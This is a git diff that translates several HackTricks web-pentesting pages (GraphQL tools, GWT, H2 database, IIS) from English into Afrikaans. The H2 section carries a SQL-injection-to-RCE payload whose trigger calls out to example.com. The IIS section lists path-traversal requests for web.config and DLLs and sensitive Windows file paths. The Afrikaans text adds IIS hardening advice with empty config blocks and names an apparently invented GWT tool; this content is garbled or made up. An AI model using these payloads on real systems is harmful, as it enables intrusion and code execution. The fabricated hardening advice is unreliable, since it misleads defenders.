+* [https://github.com/swisskyrepo/GraphQLmap](https://github.com/swisskyrepo/GraphQLmap): Kan ook gebruik word as 'n CLI-kliënt om aanvalle outomaties te outomatiseer.
+* [https://gitlab.com/dee-see/graphql-path-enum](https://gitlab.com/dee-see/graphql-path-enum): Gereedskap wat die verskillende maniere lys om 'n gegewe tipe in 'n GraphQL-skema te bereik.
+* [https://github.com/doyensec/inql](https://github.com/doyensec/inql): Burp-uitbreiding vir gevorderde GraphQL-toetsing. Die _**Scanner**_ is die kern van InQL v5.0, waar jy 'n GraphQL-eindpunt of 'n plaaslike introspeksie-skemabestand kan analiseer. Dit genereer outomaties alle moontlike navrae en mutasies, en organiseer dit in 'n gestruktureerde weergawe vir jou analise. Die _**Attacker**_ komponent stel jou in staat om batery-aanvalle op GraphQL uit te voer, wat nuttig kan wees om swak geïmplementeerde tempo-limiete te omseil.
 
-* [https://github.com/gsmith257-cyber/GraphCrawler](https://github.com/gsmith257-cyber/GraphCrawler): Toolkit that can be used to grab schemas and search for sensitive data, test authorization, brute force schemas, and find paths to a given type.
-* [https://blog.doyensec.com/2020/03/26/graphql-scanner.html](https://blog.doyensec.com/2020/03/26/graphql-scanner.html): Can be used as standalone or [Burp extension](https://github.com/doyensec/inql).
-* [https://github.com/swisskyrepo/GraphQLmap](https://github.com/swisskyrepo/GraphQLmap): Can be used as a CLI client also to automate attacks
-* [https://gitlab.com/dee-see/graphql-path-enum](https://gitlab.com/dee-see/graphql-path-enum): Tool that lists the different ways of reaching a given type in a GraphQL schema.
-* [https://github.com/doyensec/inql](https://github.com/doyensec/inql): Burp extension for advanced GraphQL testing. The _**Scanner**_ is the core of InQL v5.0, where you can analyze a GraphQL endpoint or a local introspection schema file. It auto-generates all possible queries and mutations, organizing them into a structured view for your analysis. The _**Attacker**_ component lets you run batch GraphQL attacks, which can be useful for circumventing poorly implemented rate limits.
+### Kliënte
 
-### Clients
+* [https://github.com/graphql/graphiql](https://github.com/graphql/graphiql): GUI-kliënt
+* [https://altair.sirmuel.design/](https://altair.sirmuel.design/): GUI-kliënt
 
-* [https://github.com/graphql/graphiql](https://github.com/graphql/graphiql): GUI client
-* [https://altair.sirmuel.design/](https://altair.sirmuel.design/): GUI Client
-
-### Automatic Tests
+### Outomatiese Toetse
 
 {% embed url="https://graphql-dashboard.herokuapp.com/" %}
 
-* Video explaining AutoGraphQL: [https://www.youtube.com/watch?v=JJmufWfVvyU](https://www.youtube.com/watch?v=JJmufWfVvyU)
+* Video wat AutoGraphQL verduidelik: [https://www.youtube.com/watch?v=JJmufWfVvyU](https://www.youtube.com/watch?v=JJmufWfVvyU)
 
-## References
+## Verwysings
 
 * [**https://jondow.eu/practical-graphql-attack-vectors/**](https://jondow.eu/practical-graphql-attack-vectors/)
 * [**https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696**](https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696)
@@ -536,14 +496,14 @@ query isValidDiscount($code: Int) {
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
 
 

diff --git a/network-services-pentesting/pentesting-web/gwt-google-web-toolkit.md b/network-services-pentesting/pentesting-web/gwt-google-web-toolkit.md
index 8a0780c9a..1834132b0 100644
--- a/network-services-pentesting/pentesting-web/gwt-google-web-toolkit.md
+++ b/network-services-pentesting/pentesting-web/gwt-google-web-toolkit.md
@@ -1,2 +1,49 @@
 # GWT - Google Web Toolkit
 
+Die Google Web Toolkit (GWT) is 'n raamwerk wat gebruik word om ryk en interaktiewe webtoepassings te ontwikkel. Dit maak gebruik van Java as die primêre programmeertaal en vertaal die Java-kode na effektiewe en opteimale JavaScript-kode vir uitvoering in die webblaaier.
+
+## GWT-kenmerke
+
+- **Java-gebaseerd**: GWT maak gebruik van Java as die primêre programmeertaal, wat dit maklik maak vir ontwikkelaars wat reeds bekend is met Java om webtoepassings te bou.
+
+- **Kode-vertaling**: GWT vertaal die Java-kode na JavaScript-kode wat deur die webblaaier uitgevoer kan word. Dit maak dit moontlik om ryk en interaktiewe gebruikerskoppelvlakke te skep sonder om handmatig JavaScript-kode te skryf nie.
+
+- **UI-komponente**: GWT bied 'n verskeidenheid voorafgeboude gebruikerskoppelvlakkomponente wat outomaties aangepas kan word vir verskillende webblaaierplatforms.
+
+- **RPC**: GWT bevat 'n Remote Procedure Call (RPC) meganisme wat kommunikasie tussen die kliënt en die bediener fasiliteer. Dit maak dit moontlik om data tussen die kliënt en die bediener te stuur sonder om handmatige HTTP-aanvrae te doen.
+
+- **Ontwikkelingshulpmiddels**: GWT word ondersteun deur 'n verskeidenheid ontwikkelingshulpmiddels, insluitend 'n kragtige ontwikkelingsomgewing en 'n uitgebreide stel biblioteke en hulpprogramme.
+
+## GWT-pentesting
+
+Tydens 'n GWT-pentesting moet jy die volgende aspekte ondersoek:
+
+1. **Kode-analise**: Ondersoek die vertaalde JavaScript-kode om potensiële kwesbaarhede of veiligheidsprobleme te identifiseer.
+
+2. **Netwerkverkeer**: Analiseer die netwerkverkeer tussen die kliënt en die bediener om enige sensitiewe inligting bloot te stel wat moontlik deur 'n aanvaller benut kan word.
+
+3. **Gebruikersinteraksie**: Ondersoek die gebruikersinteraksie met die webtoepassing om enige swakheid in die gebruikerskoppelvlak te identifiseer wat 'n potensiële aanvalspunt kan wees.
+
+4. **Bedienerkonfigurasie**: Ondersoek die bedienerkonfigurasie om te verseker dat dit korrek geïmplementeer is en dat daar geen bekende veiligheidslekke is nie.
+
+5. **Sessiebestuur**: Ondersoek die sessiebestuur van die webtoepassing om te verseker dat dit veilig geïmplementeer is en dat daar geen moontlikhede vir sessie-ontvoering is nie.
+
+## GWT-hulpmiddels
+
+Hier is 'n paar nuttige hulpmiddels wat gebruik kan word tydens 'n GWT-pentesting:
+
+- **GWT Developer Plugin**: 'n Inprop wat in die webblaaier geïnstalleer kan word om die ontwikkeling en debuut van GWT-toepassings te vergemaklik.
+
+- **GWT-Shell**: 'n Hulpprogram wat gebruik word om GWT-toepassings te vertaal en uit te voer.
+
+- **GWT-Compiler**: 'n Hulpprogram wat gebruik word om GWT-toepassings na JavaScript-kode te vertaal.
+
+- **Burp Suite**: 'n Veelomvattende hulpmiddelstel vir webtoepassingpentesting wat gebruik kan word om die netwerkverkeer tussen die kliënt en die bediener te analiseer.
+
+- **OWASP ZAP**: 'n Ander hulpmiddelstel vir webtoepassingpentesting wat gebruik kan word vir die identifisering van veiligheidskwesbaarhede in GWT-toepassings.
+
+- **GWT-Penetration-Testing-Tool**: 'n Spesifieke hulpmiddel wat ontwikkel is vir die pentesting van GWT-toepassings. Dit bied 'n verskeidenheid funksies en tegnieke wat spesifiek ontwerp is vir GWT-omgewings.
+
+## Bronne
+
+- [GWT - Google Web Toolkit](https://www.gwtproject.org/)
diff --git a/network-services-pentesting/pentesting-web/h2-java-sql-database.md b/network-services-pentesting/pentesting-web/h2-java-sql-database.md
index 094793d1f..857e7db31 100644
--- a/network-services-pentesting/pentesting-web/h2-java-sql-database.md
+++ b/network-services-pentesting/pentesting-web/h2-java-sql-database.md
@@ -1,62 +1,60 @@
-# H2 - Java SQL database
+# H2 - Java SQL-databasis
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

 
-Official page: [https://www.h2database.com/html/main.html](https://www.h2database.com/html/main.html)
+Amptelike bladsy: [https://www.h2database.com/html/main.html](https://www.h2database.com/html/main.html)
 
-## Access
+## Toegang
 
-You can indicate a **non-existent name a of database** in order to **create a new database without valid credentials** (**unauthenticated**):
+Jy kan 'n **nie-bestaande naam van 'n databasis** aandui om 'n nuwe databasis sonder geldige geloofsbriewe te skep (**ongeagteken**):
 
 ![](<../../.gitbook/assets/image (258).png>)
 
-Or if you know that for example a **mysql is running** and you know the **database name** and the **credentials** for that database, you can just access it:
+Of as jy weet dat byvoorbeeld 'n **mysql besig is** en jy weet die **databasisnaam** en die **geloofsbriewe** vir daardie databasis, kan jy dit net toegang:
 
 ![](<../../.gitbook/assets/image (259).png>)
 
-_**Trick from box Hawk of HTB.**_
+_**Truuk uit die Hawk-boks van HTB.**_
 
 ## **RCE**
 
-Having access to communicate with the H2 database check this exploit to get RCE on it: [https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed](https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed)
+As jy toegang het om met die H2-databasis te kommunikeer, kyk na hierdie uitbuiting om RCE daarop te kry: [https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed](https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed)
 
-## H2 SQL Injection to RCE
-
-In [**this post**](https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/) a payload is explained to get **RCE via a H2 database** abusing a **SQL Injection**.
+## H2 SQL-injectie na RCE
 
+In [**hierdie berig**](https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/) word 'n lading verduidelik om **RCE via 'n H2-databasis** te kry deur 'n **SQL-injectie** te misbruik.
 ```json
 [...]
 "details":
-    {
-        "db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER IAMPWNED BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\nnew java.net.URL('https://example.com/pwn134').openConnection().getContentLength()\n$$--=x\\;",
-        "advanced-options": false,
-        "ssl": true
-    },
+{
+"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER IAMPWNED BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\nnew java.net.URL('https://example.com/pwn134').openConnection().getContentLength()\n$$--=x\\;",
+"advanced-options": false,
+"ssl": true
+},
 [...]
 ```
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

diff --git a/network-services-pentesting/pentesting-web/iis-internet-information-services.md b/network-services-pentesting/pentesting-web/iis-internet-information-services.md
index b0772d3ee..b9b2f4a00 100644
--- a/network-services-pentesting/pentesting-web/iis-internet-information-services.md
+++ b/network-services-pentesting/pentesting-web/iis-internet-information-services.md
@@ -1,39 +1,66 @@
-# IIS - Internet Information Services
+# IIS - Internet Inligtingsdienste
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
 
 

 
-Test executable file extensions:
+Toets uitvoerbare lêeruitbreidings:
 
 * asp
 * aspx
 * config
 * php
 
-## Internal IP Address disclosure
-
-On any IIS server where you get a 302 you can try stripping the Host header and using HTTP/1.0 and inside the response the Location header could point you to the internal IP address:
+## Openbaarmaking van interne IP-adres
 
+Op enige IIS-bediener waar jy 'n 302 kry, kan jy probeer om die Host-kop te verwyder en HTTP/1.0 te gebruik. Binne die respons kan die Location-kop na die interne IP-adres verwys:
 ```
 nc -v domain.com 80
 openssl s_client -connect domain.com:443
 ```
+### Response wat die interne IP-adres bekend maak:
 
-Response disclosing the internal IP:
+As jy 'n HTTP-aanvraag stuur na 'n IIS-bediener, kan jy soms 'n respons ontvang wat die interne IP-adres van die bediener bekend maak. Hierdie inligting kan nuttig wees vir 'n aanvaller om verdere aanvalle te beplan.
 
+Dit is belangrik om hierdie inligting te beskerm en te voorkom dat dit uitlek. Om dit te doen, moet jy die volgende stappe volg:
+
+1. Stel die `UseHostName`-parameter in op `true` in die `applicationHost.config`-lêer. Hierdie parameter verseker dat die bediener die hostnaam in plaas van die IP-adres in die HTTP-respons gebruik.
+
+   ```plaintext
+   
+     
+       
+         
+       
+     
+   
+   ```
+
+2. Stel die `forwardWindowsAuthToken`-parameter in op `false` in die `applicationHost.config`-lêer. Hierdie parameter voorkom dat die bediener die interne IP-adres in die `WWW-Authenticate`-kop van die respons insluit.
+
+   ```plaintext
+   
+     
+       
+         
+       
+     
+   
+   ```
+
+Deur hierdie stappe te volg, kan jy die risiko van die bekendmaking van die interne IP-adres van jou IIS-bediener verminder.
 ```
-GET / HTTP/1.0       
+GET / HTTP/1.0
 
 HTTP/1.1 302 Moved Temporarily
 Cache-Control: no-cache
@@ -42,20 +69,19 @@ Location: https://192.168.5.237/owa/
 Server: Microsoft-IIS/10.0
 X-FEServer: NHEXCHANGE2016
 ```
+## Voer .config-lêers uit
 
-## Execute .config files
+Jy kan .config-lêers oplaai en dit gebruik om kode uit te voer. Een manier om dit te doen, is om die kode aan die einde van die lêer te voeg binne 'n HTML-kommentaar: [Laai voorbeeld hier af](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config/web.config)
 
-You can upload .config files and use them to execute code. One way to do it is appending the code at the end of the file inside an HTML comment: [Download example here](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config/web.config)
+Meer inligting en tegnieke om hierdie kwesbaarheid uit te buit [hier](https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/)
 
-More information and techniques to exploit this vulnerability [here](https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/)
+## IIS Ontdekking Bruteforce
 
-## IIS Discovery Bruteforce
-
-Download the list that I have created:
+Laai die lys af wat ek geskep het:
 
 {% file src="../../.gitbook/assets/iisfinal.txt" %}
 
-It was created merging the contents of the following lists:
+Dit is geskep deur die inhoud van die volgende lyste saam te voeg:
 
 [https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt)\
 [http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html](http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html)\
@@ -64,72 +90,65 @@ It was created merging the contents of the following lists:
 [https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt)\
 [https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt](https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt)
 
-Use it without adding any extension, the files that need it have it already.
+Gebruik dit sonder om enige uitbreiding by te voeg, die lêers wat dit nodig het, het dit reeds.
 
-## Path Traversal
+## Pad Traversal
 
-### Leaking source code
+### Uitlek van bronkode
 
-Check the full writeup in: [https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html](https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html)
+Kyk na die volledige bespreking by: [https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html](https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html)
 
 {% hint style="info" %}
-As summary, there are several web.config files inside the folders of the application with references to "**assemblyIdentity**" files and "**namespaces**". With this information it's possible to know **where are executables located** and download them.\
-From the **downloaded Dlls** it's also possible to find **new namespaces** where you should try to access and get the web.config file in order to find new namespaces and assemblyIdentity.\
-Also, the files **connectionstrings.config** and **global.asax** may contain interesting information.\
+As opsomming, daar is verskeie web.config-lêers binne die toepassings se lêers met verwysings na "**assemblyIdentity**" lêers en "**namespaces**". Met hierdie inligting is dit moontlik om te weet **waar uitvoerbare lêers geleë is** en om hulle af te laai.\
+Van die **afgelaaide Dlls** is dit ook moontlik om **nuwe namespaces** te vind waar jy probeer toegang kry en die web.config-lêer te kry om nuwe namespaces en assemblyIdentity te vind.\
+Ook kan die lêers **connectionstrings.config** en **global.asax** interessante inligting bevat.\
 
 {% endhint %}
 
-In **.Net MVC applications**, the **web.config** file plays a crucial role by specifying each binary file the application relies on through **"assemblyIdentity"** XML tags.
+In **.Net MVC-toepassings** speel die **web.config**-lêer 'n belangrike rol deur elke binêre lêer wat die toepassing afhanklik is, te spesifiseer deur middel van **"assemblyIdentity"** XML-etikette.
 
-### **Exploring Binary Files**
-
-An example of accessing the **web.config** file is shown below:
+### **Verkenning van Binêre Lêers**
 
+'n Voorbeeld van toegang tot die **web.config**-lêer word hieronder getoon:
 ```markup
 GET /download_page?id=..%2f..%2fweb.config HTTP/1.1
 Host: example-mvc-application.minded
 ```
+Hierdie versoek openbaar verskeie instellings en afhanklikhede, soos:
 
-This request reveals various settings and dependencies, such as:
+- **EntityFramework** weergawe
+- **AppSettings** vir webbladsye, klientvalidasie, en JavaScript
+- **System.web** konfigurasies vir outentifikasie en uitvoertyd
+- **System.webServer** modules-instellings
+- **Runtime** saamgestelde bindings vir verskeie biblioteke soos **Microsoft.Owin**, **Newtonsoft.Json**, en **System.Web.Mvc**
 
-- **EntityFramework** version
-- **AppSettings** for webpages, client validation, and JavaScript
-- **System.web** configurations for authentication and runtime
-- **System.webServer** modules settings
-- **Runtime** assembly bindings for numerous libraries like **Microsoft.Owin**, **Newtonsoft.Json**, and **System.Web.Mvc**
+Hierdie instellings dui daarop dat sekere lêers, soos **/bin/WebGrease.dll**, binne die aansoek se /bin-vouer geleë is.
 
-These settings indicate that certain files, such as **/bin/WebGrease.dll**, are located within the application's /bin folder.
+### **Hoofgidslêers**
 
-### **Root Directory Files**
+Lêers wat in die hoofgids gevind word, soos **/global.asax** en **/connectionstrings.config** (wat sensitiewe wagwoorde bevat), is noodsaaklik vir die konfigurasie en werking van die aansoek.
 
-Files found in the root directory, like **/global.asax** and **/connectionstrings.config** (which contains sensitive passwords), are essential for the application's configuration and operation.
-
-### **Namespaces and Web.Config**
-
-MVC applications also define additional **web.config files** for specific namespaces to avoid repetitive declarations in each file, as demonstrated with a request to download another **web.config**:
+### **Namespaces en Web.Config**
 
+MVC-aansoeke definieer ook addisionele **web.config-lêers** vir spesifieke namespaces om herhalende verklarings in elke lêer te voorkom, soos gedemonstreer met 'n versoek om 'n ander **web.config** af te laai:
 ```markup
 GET /download_page?id=..%2f..%2fViews/web.config HTTP/1.1
 Host: example-mvc-application.minded
 ```
+### **Aflaai van DLLs**
 
-### **Downloading DLLs**
-
-The mention of a custom namespace hints at a DLL named "**WebApplication1**" present in the /bin directory. Following this, a request to download the **WebApplication1.dll** is shown:
-
+Die vermelding van 'n aangepaste namespace dui op 'n DLL met die naam "**WebApplication1**" wat in die /bin-gids aanwesig is. Daarna word 'n versoek om die **WebApplication1.dll** af te laai, getoon:
 ```markup
 GET /download_page?id=..%2f..%2fbin/WebApplication1.dll HTTP/1.1
 Host: example-mvc-application.minded
 ```
+Dit dui op die teenwoordigheid van ander noodsaaklike DLL's, soos **System.Web.Mvc.dll** en **System.Web.Optimization.dll**, in die /bin gids.
 
-This suggests the presence of other essential DLLs, like **System.Web.Mvc.dll** and **System.Web.Optimization.dll**, in the /bin directory.
+In 'n scenario waar 'n DLL 'n naamsruimte genaamd **WebApplication1.Areas.Minded** invoer, kan 'n aanvaller die bestaan van ander web.config-lêers in voorspelbare paaie aflei, soos **/area-naam/Views/**, wat spesifieke konfigurasies en verwysings na ander DLL's in die /bin gids bevat. Byvoorbeeld, 'n versoek na **/Minded/Views/web.config** kan konfigurasies en naamsruimtes openbaar wat die teenwoordigheid van 'n ander DLL, **WebApplication1.AdditionalFeatures.dll**, aandui.
 
-In a scenario where a DLL imports a namespace called **WebApplication1.Areas.Minded**, an attacker might infer the existence of other web.config files in predictable paths, such as **/area-name/Views/**, containing specific configurations and references to other DLLs in the /bin folder. For example, a request to **/Minded/Views/web.config** can reveal configurations and namespaces that indicate the presence of another DLL, **WebApplication1.AdditionalFeatures.dll**.
-
-### Common files
-
-From [here](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)
+### Algemene lêers
 
+Van [hier](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)
 ```
 C:\Apache\conf\httpd.conf
 C:\Apache\logs\access.log
@@ -193,7 +212,7 @@ C:\Windows\System32\drivers\etc\hosts
 C:\Windows\System32\winevt\Logs\Application.evtx
 C:\Windows\System32\winevt\Logs\Security.evtx
 C:\Windows\System32\winevt\Logs\System.evtx
-C:\Windows\win.ini 
+C:\Windows\win.ini
 C:\xampp\apache\conf\extra\httpd-xampp.conf
 C:\xampp\apache\conf\httpd.conf
 C:\xampp\apache\logs\access.log
@@ -206,73 +225,71 @@ C:\xampp\security\webdav.htpasswd
 C:\xampp\sendmail\sendmail.ini
 C:\xampp\tomcat\conf\server.xml
 ```
+## HTTPAPI 2.0 404 Fout
 
-## HTTPAPI 2.0 404 Error
+As jy 'n fout soos die volgende sien:
 
-If you see an error like the following one:
+![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png>)
 
-![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png>)
+Dit beteken dat die bediener **nie die korrekte domeinnaam** in die Host-kop ingekry het nie.\
+Om toegang tot die webblad te verkry, kan jy kyk na die bediende **SSL-sertifikaat** en miskien kan jy die domein/subdomeinnaam daarin vind. As dit nie daar is nie, moet jy dalk **VHosts** met geweld afdwing totdat jy die korrekte een vind.
 
-It means that the server **didn't receive the correct domain name** inside the Host header.\
-In order to access the web page you could take a look to the served **SSL Certificate** and maybe you can find the domain/subdomain name in there. If it isn't there you may need to **brute force VHosts** until you find the correct one.
+## Ouer IIS-gebreklikhede wat die moeite werd is om na te kyk
 
-## Old IIS vulnerabilities worth looking for
+### Microsoft IIS tilde-karakter "\~" Gebrek/Funksie - Kort lêernaam-/vouernaam-onthulling
 
-### Microsoft IIS tilde character “\~” Vulnerability/Feature – Short File/Folder Name Disclosure
+Jy kan probeer om **vouers en lêers** binne elke ontdekte vouer op te som (selfs as dit Basiese Verifikasie vereis) deur hierdie **tegniek** te gebruik.\
+Die grootste beperking van hierdie tegniek as die bediener kwesbaar is, is dat dit slegs tot die eerste 6 letters van die naam van elke lêer/vouer en die eerste 3 letters van die uitbreiding van die lêers kan vind.
 
-You can try to **enumerate folders and files** inside every discovered folder (even if it's requiring Basic Authentication) using this **technique**.\
-The main limitation of this technique if the server is vulnerable is that **it can only find up to the first 6 letters of the name of each file/folder and the first 3 letters of the extension** of the files.
-
